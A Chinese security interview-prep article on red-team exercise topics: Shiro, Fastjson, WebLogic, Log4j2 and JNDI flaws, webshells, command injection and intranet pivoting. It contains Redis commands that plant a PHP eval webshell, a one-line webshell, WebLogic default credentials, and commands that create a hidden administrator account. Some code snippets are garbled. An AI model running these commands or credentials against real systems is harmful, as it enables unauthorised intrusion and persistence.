【建议收藏】HVV面试宝典

admin 2023年8月7日15:07:00评论77 views字数 11855阅读39分31秒阅读模式

击上方蓝字关注我们


【建议收藏】HVV面试宝典
免责声明

本公众号所分享的一切内容皆仅用于相关专业方向从业者学习交流 由于传播、利用本公众号所提供的任何信息而造成的任何直接或者间接的影响及损失均由使用者本人负责,本公众号及原作者不为承担任何责任,一切后果皆由使用者自行承担!


本文主要是讲解遇到问题的各思路解决方法,不仅可做为面试题查看,在实操中收到思绪的阻碍也可作为参考



由于公众号篇幅有限和排版限制(看上去会比较乱),不能将全部内容一并展示,为提升观看体验可以点击上方公众号蓝字回复关键字后台获取PDF版,关键字在文章底部

平常怎么去发现 Shiro 漏洞的?

Apache Shiro 是一个 Java 安全框架,执行身份验证、授权、密码和会话管理。apacheShiro 框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。

shiro 反序列化漏洞:shiro 在 CookieRememberMeManaer 类中将 cookie 中 rememberMe  字段内容分别进行序列化、AES 加密、Base64 编码操作。攻击者构造一个恶意的对象,并且对其序列化,AES 加密,base64 编码后,作为 cookie 的 rememberMe 字段发送。Shiro 将 rememberMe 进行解密并且反序列化,最终造成反序列化漏洞。

登陆失败时候会返回 rememberMe=deleteMe 字段或者使用 shiroScan 被动扫描去发现

完整:

未登陆的情况下,请求包的 cookie 中没有 rememberMe 字段,返回包 set-Cookie 里也没有 deleteMe 字段

登陆失败的话,不管勾选 RememberMe 字段没有,返回包都会有 rememberMe=deleteMe 字段

不勾选 RememberMe 字段,登陆成功的话,返回包 set-Cookie 会有 rememberMe=deleteMe 字段。但是之后的所有请求中 Cookie 都不会有 rememberMe 字段

勾选 RememberMe 字段,登陆成功的话,返回包 set-Cookie 会有 rememberMe=deleteMe 字段,还会有 rememberMe 字段,之后的所有请求中 Cookie 都会有 rememberMe 字段

shiro 有几种漏洞类型

shiro 550

shiro 721

Apache Shiro 框架提供了记住我的功能(RemeberMe),用户登录成功后会生成经过加密并编码的 cookie。cookie 的 key 为  RemeberMe,cookie 的值是经过对相关信息进行序列化,然后使用 aes 加密,最后在使用 base64 编码处理形成的

在服务端接收 cookie 值时,按以下步骤解析:

检索 RemeberMe cookie 的值

Base 64 解码

使用 ACE 解密(加密密钥硬编码)

进行反序列化操作(未作过滤处理)

在调用反序列化的时候未进行任何过滤,导致可以触发远程代码执行漏洞

用户登陆成功后会生成经过加密并编码的  cookie,在服务端接收 cookie 值后,Base64 解码 -->AES 解密 --> 反序列化。攻击者只要找到 AES  加密的密钥,就可以构造一个恶意对象,对其进行序列化 -->AES 加密 -->Base64 编码,然后将其作为 cookie 的  rememberMe 字段发送,Shiro 将 rememberMe 进行解密并且反序列化,最终造成反序列化漏洞。

WebLogic 权限绕过的姿势?

CVE-2020-14883 是一个 Console 的未授权访问,而 CVE-2020-14883 是在利用未授权访问的前提下,在 Console 进行代码执行,于是远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码。

1、 通过静态资源来绕过权限验证,防止被重定向到登陆界面。

2、 通过请求 .portal ,控制处理的 Servlet 是渲染 UIMBeanUtilsInitSingleFileServlet

3、 通过编码后的 ../ ,让最终渲染的模版是 console.portal

综合起来,才造成了最终的未授权访问。

Fastjson 漏洞利用原理?

在请求包里面中发送恶意的 json 格式 payload,漏洞在处理 json 对象的时候,没有对 @type 字段进行过滤,从而导致攻击者可以传入恶意的  TemplatesImpl 类,而这个类有一个字段就是_bytecodes,有部分函数会根据这个_bytecodes 生成 java  实例,这就达到 fastjson 通过字段传入一个类,再通过这个类被生成时执行构造函数。

FastJson 是一个由阿里巴巴研发的 java 库,可以把 java 对象转换为 JSON 格式,也可以把 JSON 字符串转换为对象。

通俗理解就是:漏洞利用 fastjson autotype 在处理 json 对象的时候,未对 @type 字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程 rmi 主机,通过其中的恶意类执行代码。

攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。

Fastjson RCE 的本质就是在反序列化时会调用目标类的 setter 方法。以 com.sun.rowset.JdbcRowSetImpl Gadget 为例,类中的 setAutoCommit 方法中通过 connect 方法调用了 lookup 方法,且 lookup 方法的参数又能通过  setDataSourceName 方法设置,即其参数可控。那么就会导致 JNDI 注入,最终实现任意命令执行。

Java 处理 Json 格式数据有三个比较流行的类库:

  • Gson (google 维护)
  • Jackson
  • Fastjson

简述一下Redis 未授权访问漏洞。

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将  Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空),会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取  Redis 的数据。攻击者在未授权访问 Redis 的情况下,可以利用 Redis 自身的提供的 config 命令像目标主机写  WebShell、写 SSH 公钥、创建计划任务反弹 Shell 等。其思路都是一样的,就是先将 Redis 的本地数据库存放目录设置为 web 目录、~/.ssh 目录或 /var/spool/cron 目录等,然后将  dbfilename(本地数据库文件名)设置为文件名你想要写入的文件名称,最后再执行 save 或 bgsave  保存,则我们就指定的目录里写入指定的文件了。

redis 绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略,直接暴露在公网。 没有设置密码认证(一般为空),可以免密码远程登录 redis 服务。

config set dir /var/www/html/ 
config set dbfilename shell.php
set xxx "<?php eval($_POST[whoami]);?>" 
save

Redis 未授权访问漏洞如何利用?

服务端的 Redis 连接存在未授权,在攻击机上能用 redis-cli 直接登陆连接,并未登陆验证。 开了服务端存在 Web 服务器,并且知道 Web 目录的路径(如利用 phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限。

讲一下MongoDB 未授权访问漏洞

MongoDB 服务安装后,默认未开启权限验证。如果服务监听在 0.0.0.0,则可远程无需授权访问数据库。

3.0 之前版本的 MongoDB, 默认监听在 0.0.0.0,3.0 及之后版本默认监听在 127.0.0.1。

3.0 之前版本,如未添加用户管理员账号及数据库账号,使用 --auth 参数启动时,在本地通过 127.0.0.1 仍可无需账号密码登陆访问数据库,远程访问则提示需认证;

3.0 及之后版本,使用 --auth 参数启动后,无账号则本地和远程均无任何数据库访问权限。

JNDI 注入是什么?

JNDI RCE 漏洞产生的原因就在于当我们在注册 RMI 服务时,可以指定 Codebase url,也就是远程要加载类的位置,设 置该属性可以让 JDNI 应用程序在加载时去寻找我们指定的类 ( 例如:http://ip:port/EvilObject.class) 。

这里还有一个比较重要的点,也是触发恶意代码的点。就是当 JNDI 应用程序通过 lookup (RMI 服务的地址) 方法调用指 定 Codebase url  上的类后,会调用被远程调用类的构造方法,所以如果我们将恶意代码放在被远程调用类的构造方法中时, 漏洞就会触发。

讲一下WebLogic 系列漏洞

Weblogic 漏洞有哪些?

weblogic 就好多了,基于 T3 协议的反序列化;基于 xml 解析时候造成的反序列化,还有 ssrf,权限绕过等等

Weblogic 反序列化漏洞 CVE-2021-2394
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
Weblogic RCE CVE-2020-14882&14883
weblogic jndi注入CVE-2020-14841
Weblogic coherence组件iiop反序列化漏洞 (CVE-2020-14644)
WebLogic UniversalExtractor反序列化漏洞 CVE-2020-14645
WebLogic CVE-2020-14756 T3IIOP反序列化RCE
Weblogic 远程代码执行漏洞 CVE-2020-2883
Weblogic CVE-2020-2551 IIOP协议反序列化rce
Weblogic反序列化漏洞 CVE-2019-2890
Weblogic反序列化远程代码执行漏洞CVE-2019-2725
Weblogic反序列化漏洞 CVE-2019-2729
Weblogic任意文件读取漏洞(CVE-2019-2615))
Weblogic 文件上传漏洞(CVE-2019-2618)
weblogic 反序列化漏洞 CVE-2018-3252
Weblogic反序列化远程代码执行漏洞 CVE-2018-3245
Weblogic远程代码执行漏洞 CVE-2018-3191
Weblogic任意文件上传漏洞(CVE-2018-2894)
Weblogic WLS核心组件反序列化漏洞 CVE-2018-2893
Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
Weblogic 反序列化漏洞 CVE-2017-3506
Weblogic 反序列化漏洞 CVE-2017-3248
Weblogic SSRF漏洞 CVE-2014-4210
  • Weblogic 漏洞扫描工具

安装工具:

  1. 安装依赖 python >= 3.6 pip3 install requests

  2. 下载 weblogicScanner

    https://github.com/0xn0ne/weblogicScanner

  3. 进入 weblogicScanner

  4. 举例:测试本机是否存在漏洞 python ws.py -t 127.0.0.1

WebLogic 常用弱口令有哪些?

weblogic Oracl@123
weblogic weblogic
guest guest
portaladmin portaladmin
admin security
joe password
mary password
system security
wlcsystem wlcsystem
wlcsystem sipisystem
system password

简述一下Log4j2 漏洞

Apache Log4j2 是一个基于 Java 的日志记录工具。Apache Log4j 2.x <= 2.14.1 版本存在远程代码执行漏洞。  漏洞的主要原因是 log4j2  的接收器对于不可靠来源的输入没有过滤,攻击者则可以利用此特性通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。由于 Log4j2  组件在处理程序日志记录时存在 JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向服务器发送恶意的数据,触发 log4j2  组件的缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

为了输出日志时能够方便地输出任意位置的 java 对象,Log4j2 引入了一个叫 Lookup  的统一接口。这个接口允许在写日志的时候,按照具体的实现逻辑去查找对象的位置,并输出对象的内容。这里的对象通常在内存中,但由于 java  支持对象的序列化 / 反序列化,它也可以存储在硬盘文件里,甚至是远程服务器上。

我们提到的 JNDI 就是对 Lookup  接口的一种实现。其本身也是一个接口,提供了命名关键字到对象的映射目录,允许开发者提供一个名称,即可获取到对象的内容。LDAP,即轻量级目录访问协议,是 JNDI 的一种底层实现,它可以让我们方便的查询分布式数据库。既然是分布式的,LDAP  允许从远程服务器加载对象。而这里加载对象时使用的不是一般的反序列化方法,而是通过「命名引用」功能,支持直接从远程下载 class  文件并加载对象。

于是,Log4j2 中就暗含了注入漏洞:允许传入参数解析为 LDAP 协议,从远程服务器下载 class 文件并执行。这个功能本来是为了方便开发,使 java 对象位置对上层应用透明,却不料酿成大祸

简述Struts2 漏洞

Struts2 是 apache 项目下的一个 web 框架,使用 OGNL 作为默认的表达式语言,由于 OGNL  能够创建或更改可执行代码,因此能够为使用它的任何框架引入严重的安全漏洞,多个 Apache Struts 2 版本容易受到 OGNL  安全漏洞的攻击。

WebShell 的利用

Webshell 是黑客经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除 web  页面、修改主页等。黑客通常利用常见的漏洞,如 SQL 注入、远程文件包含 (RFI)、FTP,甚至使用跨站点脚本攻击 (XSS)  等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。

黑客可以用 web 的方式,通过 asp 或 php 木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

Webshell 可以嵌套在正常网页中运行,且不容易被查杀。它还可以穿越服务器防火墙,由于与被控制服务器或远程主机交互的数据都是通过 80  端口传递,因此不会被防火墙拦截,在没有记录流量的情况下,Webshell 使用 post 包发送,也不会被记录在系统日志中,只会在 Web  日志中记录一些数据提交的记录。

  • WebShell 的分类 ①根据文件大小分类:大马和小马 (通常指的是一句话木马,能够使用菜刀这类工具去直接连接它) ②根据脚本名称分类:jsp、asp、aspx、php

  • WebShell 的利用

    寻找页面上传点

    写好一句话木马(上传木马),比如如下的 PHP 一句话木马的代码:

    _POST['shell']); ?>

    然后寻找上传后的文件位置(绝对路径),可以用蚁剑、中国菜刀等工具连接到主机进行接下来的操作,比如提权。

  • WebShell 有哪些特征?

    • 持久化远程访问

      Webshell 脚本通常会包含后门,黑客上传 Webshell 之后,就可以充分利用 Webshell  的后门实现远程访问并控制服务器,从而达到长期控制网站服务器的目的。此外,在上传完 Webshell  之后,黑客会选择自己修复漏洞,以确保没有其他人会利用该漏洞。通过这种方式,黑客就可以一种低调的姿态,避免与管理员进行任何交互,同时仍然获得相同的结果。

  • 提权

    在服务器没有配置错误的情况下,Webshell 将在 web 服务器的用户权限下运行,而用户权限是有限的。通过 Webshell,黑客可以利用系统上的本地漏洞来实现权限提升,从而获得  Root 权限,这样黑客基本上可以在系统上做任何事情,包括安装软件、更改权限、添加和删除用户、窃取密码、阅读电子邮件等等。

  • 隐藏性极强

    Webshell 可以嵌套在正常网页中运行,且不容易被查杀。它还可以穿越服务器防火墙,由于与被控制服务器或远程主机交互的数据都是通过 80  端口传递,因此不会被防火墙拦截,在没有记录流量的情况下,Webshell 使用 post 包发送,也不会被记录在系统日志中,只会在 Web  日志中记录一些数据提交的记录。

  • WebShell 常用的 PHP 函数

    Webshell 几乎适用于所有 Web 编程语言。之所以关注 PHP,是因为它是 web 上使用最广泛的编程语言。下面是 PHP 中一些执行 shell 命令最常用的函数。

    • system()

      system () 函数将命令作为参数,并输出结果。

      下面的示例是在 Windows 操作系统上运行 dir 命令,然后返回 PHP 文件所在目录的目录列表。

      <?php
          echo system('ls -al');

exec()

exec () 功能是将命令作为参数,但不输出结果。

如果指定了第二个可选参数,则返回结果为数组。否则,如果回显,只显示结果的最后一行。

<?php
    echo exce('ls -al');
    echo exce('ls -al',$array);
    var_dump($array);

shell_exec()

shell_exec () 函数类似于 exec (),但是,其整个输出结果为字符串。

<?php
    echo shell_exce('ls -al');

passthru()

passthru () 执行一个命令并返回原始格式的输出。

<?php
    echo passthru('ls -al');
  • proc_open()

    proc_open () 可以创建一个处理程序(流程),实现脚本和要运行的程序之间的通信。

  • 倒引号

    PHP 会首先执行 shell 命令中倒引号(`)内的内容

序列化与反序列化

  • 序列化:把对象转化为可传输的字节序列过程称为序列化
  • 反序列化:把字节序列还原为对象的过程称为反序列

命令执行漏洞是什么

命令执行漏洞是值攻击者可以随意执行系统命令,它属于高危漏洞之一,也属于代码执行的范畴。命令执行漏洞不仅存在 B/S 架构中,还在 C/S 架构中也常常遇到。

应用有时需要调用一些执行系统命令的函数,如 PHP 的 system 、exec、shell_exec、passthru、proc_popen  等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

命令执行漏洞的危害

  • 继承 web 服务程序的权限去执行系统命令或读写文件
  • 反弹 Shell
  • 控制整个网站甚至控制服务器
  • 进一步内网渗透

命令执行漏洞的原理

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如 PHP 中的 system、 exec、shell_exec 等,如果用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常的命令中, 造成命令执行漏洞。

在操作系统中,“&、|、||” 都可以作为命令连接符使用, 用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,从而造成漏洞。

命令执行漏洞成因

  • 代码层过滤不严格

    商业应用需要执行命令,商业应用的一些核心代码可能在二进制文件当中,在 web 应用中通过 system 函数调用。例如 system ("/bin/program --arg c194a9eg<!-- begin-inline-katexarg");

  • 系统漏洞造成命令注入

    例如 bash 破壳漏洞 (CVE-2014-6271),如果我们控制执行的 bash 的环境变量,就可以通过破壳漏洞来执行任意代码。

  • 第三方组件造成命令注入

    如 Wordpress,可以选择 ImageMagick 这个常用的 图片处理组件,处理用户上传图片时造成命令执行,如 JAVA 中 Struts2/ElasticsearchGroovy 等。

命令执行漏洞常见函数

  • System 函数的语法是: system (string $command [, int &end-inline-katex-->return_var ] )
    • 同 C 版本的 system () 函数一样
    • 本函数执行 command 参数所指定的命令,并且输出执行结果
    • 命令执行后的返回值为输出值的最后一行
    • 函数本身也会打印全部的输出值
  • Exec 函数的语法为:exec (string output [, int &c194a9eg<!-- begin-inline-katexreturn_var]] )
    • 这个函数的作用是执行 command 参数所指定的命令
    • 命令执行后的值为输出值的最后一行
    • 函数本身不会打印任何内容
  • Passthru 函数的语法为:passthru (string $command [, int &end-inline-katex-->return_var ] )
    • 同 exec () 函数类似
    • passthru () 函数也是用来执行外部命令 command 的
    • 当所执行的系统命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec () 或 system () 函数。
  • Shell_exec 函数的语法为: shell_exec (string $cmd)
    • cmd 是要执行的命令
    • String 是参数的数据类型,也就是字符串。
    • 函数会在命令执行完成后将全部的输出值作为字符串输入返回值,本身并不打印任何信息。
    • Shell_exec 函数的用法同反引号形同,注意是反引号(``)而不是普通单引号(’’)。

命令执行漏洞连接符

&: 顺序执行多条命令,而不管命令是否执行成功

&&: 逻辑与,当用此连接符连接多个命令时,前面的命令执行成功,才会执行后面的命令, 前面的命令执行失败,后面的命令不会执行,与 || 正好相反

|: 显示后面命令的结果

||: 逻辑或,当用此连接符连接多个命令时,前面的命令执行成功,则后面的命令不会执行。 前面的命令执行失败,后面的命令才会执行

命令执行漏洞防御

  • 不执行外部的应用程序或命令

    尽量使用自定义函数或函数库实现外部应用程序或命令的功能。在 执行 system、eval 等命令执行功能的函数前,要先确定参数内容。

  • 使用 escapeshellarg 函数处理相关参数

    Escapeshellarg 函数会将任何引起参数或命令结束的字符进行转义

  • 使用 safe_mode_exec_dir 执行可执行的文件路径

    将 php.ini 文件中的 safe_mode 设置为 On,然后将允许执行的文件放入一个目录中,并使用 safe_mode_exec_dir 指定这个可执行的文 件路径。

Winodws 命令执行漏洞介绍

Windows 命令执行漏洞,就是在 Winodws 环境下存在的命令执行漏洞,通过相关的漏洞验证方法确认了存在命令执行漏洞后,我们可以使用 Windows 环境下的一些命令去对漏洞进行利用。

  • 通过涉及到主机探测、扫描、路由、协议、远程、进程、端口、服务等常见的 Windows 的命令
  • 如果我们的服务器是一台 Windows 操作系统,存在着命令执行漏洞
  • 我们就可以通过上面的这些漏洞进行命令执行的操作
  • 对 Windows 服务器系统进行扫描探测、进行进程和服务管理、进行内网渗透、服务器提限等

Windows 命令执行漏洞利用**

通过以上的学习我们知道了 Windows 下的命令执行漏洞的原理以及一些利用方法,下面将列出常用到的 Windows 命令,可以利用到 Windows 命令执行的漏洞当中去。

  • ipconfig /all 查看网络连接
  • net use ipipc$ "" /user:" "    建立 IPC 空链接
  • net use ipipc$ "密码" /user:"用户名" 建立 IPC 非空链接
  • net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方 C:到本地为 H:
  • net use h: ipc$ 登陆后映射对方 C:到本地为 H:
  • net use ipipc$ /del 删除 IPC 链接
  • net use h: /del 删除映射对方到本地的为 H: 的映射
  • net user guest /active:yes 激活 guest 用户
  • net user guest 12345 用 guest 用户登陆后用将密码改为 12345
  • echo 信息 >> pass.txt 将 "信息" 保存到 pass.txt 文件中

Linux 命令执行漏洞

  • Linux 命令执行漏洞,就是在 Linux 服务器上存在的命令执行下漏洞
  • Linux 命令执行漏洞相对于 Windows 命令执行漏洞来说,利用起来更加的容易
  • 因为 Linux 的一些操作本省就是需要通过一些命令去进行管理和执行

命令在 Linux 中的执行分为 4 步:判断路径、检查别名、判断内外部、路径查找文件

Linux 命令执行漏洞Linux 命令执行漏洞利用

  • Linux 系统下基本命令,我们注意这些命令要区分大小写
  • 通过这些命令我们可以对 Linux 下的命令执行漏洞进行利用
  • 包括系统、资源、进程、网络、用户、服务等常见的 Linux 系统命令

内网渗透

内网渗透基本流程

漏洞挖掘 - 漏洞利用 - 提权准备 - 提权

【建议收藏】HVV面试宝典
img

前提是利用已经控制的一台计算机作为入侵内网的跳板,在其他内网计算机看来访问全部来自于跳板机 (WEB Server)

讲一下自己的渗透经验

查看是否存在一些高危端口,如 443 的心脏滴血,445 的永恒之蓝这两个是我知道的。如果扫到其他端口,那么可以用 metasploit 的 search  命令,去查看是否有相应的漏洞。假如说我们在内网渗透中,通过 nmap 扫到了 samba 服务,那么我们就可以去找一个最新的它的漏洞尝试攻击它。

如何判断网站是否有 CDN?

  • 传统访问:用户访问域名 --> 解析服务器 IP--> 访问目标主机
  • 普通 CDN:用户访问域名 -->CDN 节点 --> 真实服务器 IP--> 访问目标主机
  • 带 WAF 的 CDN:用户访问域名 -->CDN 节点(云 WAF)--> 真实服务器 IP--> 访问目标主机

很简单,使用不同地方的 ping 服务,查看对应 IP 地址是否唯一,如果不唯一则极有可能是使用了 CDN

1、通过 ping 命令,查看回显情况 2、windows 系统环境下,使用 nslookup 进行查询,看返回的域名解析的情况 3、超级 ping 工具,比如”all-tool.cn/tools   /ping“「看 ip 结果」

如何判断靶标站点是 windows/linux?

1、大小写检测:windows 大小写不敏感,而 linux 大小写敏感。

2、PING 指令:根据 TTL 值,winodws 一般情况下 > 100,linux<100 TTL (生存时间值):该字段指定 IP 包被路由器丢弃之前允许通过的最大网段数量。

如何建立隐藏用户?

1、net user test$ 123456 /add [建立隐藏用户]
2、net localgroup administrators test$ /add

正向代理和反向代理的区别?

正向代理即是客户端代理,代理客户端,服务端不知道实际发起请求的客户端 反向代理即是服务端代理,代理服务端,客户端不知道实际提供服务的服务端

正向 Shell:攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。 反向 Shell:被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。 正向代理即是客户端代理,代理客户端,服务端不知道实际发起请求的客户端. 反向代理即是服务端代理,代理服务端,客户端不知道实际提供服务的服务端

横向渗透命令执行手段?

psexec,wmic,smbexec,winrm,net use 共享 + 计划任务 + type 命令

psexec 和 wmic 或者其他的区别?

psexec 会记录大量日志,wmic 不会记录下日志。wmic 更为隐蔽

域内攻击方法有了解过吗?

MS14-068、Roasting 攻击离线爆破密码、委派攻击,非约束性委派、基于资源的约束委派、ntlm relay

桌面有管理员会话,想要做会话劫持怎么做?

提权到 system 权限,然后去通过工具,就能够劫持任何处于已登录用户的会话,而无需获得该用户的登录凭证。



由于公众号篇幅有限和排版限制,不能将全部内容一并展示,为提升观看体验可以点击下方公众号名片回复关键字后台获取PDF版。


【建议收藏】HVV面试宝典


点击下方公众号回复“0803获取文件


【建议收藏】HVV面试宝典


【建议收藏】HVV面试宝典

关注获取更多

同时欢迎各位加入交流群进行交流讨论,有其他需求或者寻求帮助的可以在群里进行讨论交流,群里也会分享一些工具和教程,添加时请根据您的来意备注安全从业软件资源交流[不会推送安全相关资源], 会根据不同的备注分别加入不同群(记得备注)

【建议收藏】HVV面试宝典

非安全NoTSEC

往期推荐

【安全神器】一款红队/渗透测试隐藏痕迹的工具

微信多开,还能防撤回,自动抢红包?这个工具太强了吧!-信息差消除计划-004

sql注入的绕过技巧bypass,建议收藏

渗透测试利器BurpSuitePRO最新汉化破解版

常见WebShell的流量特征及检测思路

手机号带来的溯源方法&一些防护建议

安全神器 | 一款功能强大的Java自动代码审计工具

云渗透-云原生靶机实战:综合场景

分享收藏点赞在看


原文始发于微信公众号(非安全):【建议收藏】HVV面试宝典

  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月7日15:07:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【建议收藏】HVV面试宝典https://cn-sec.com/archives/1933418.html

发表评论

匿名网友 填写信息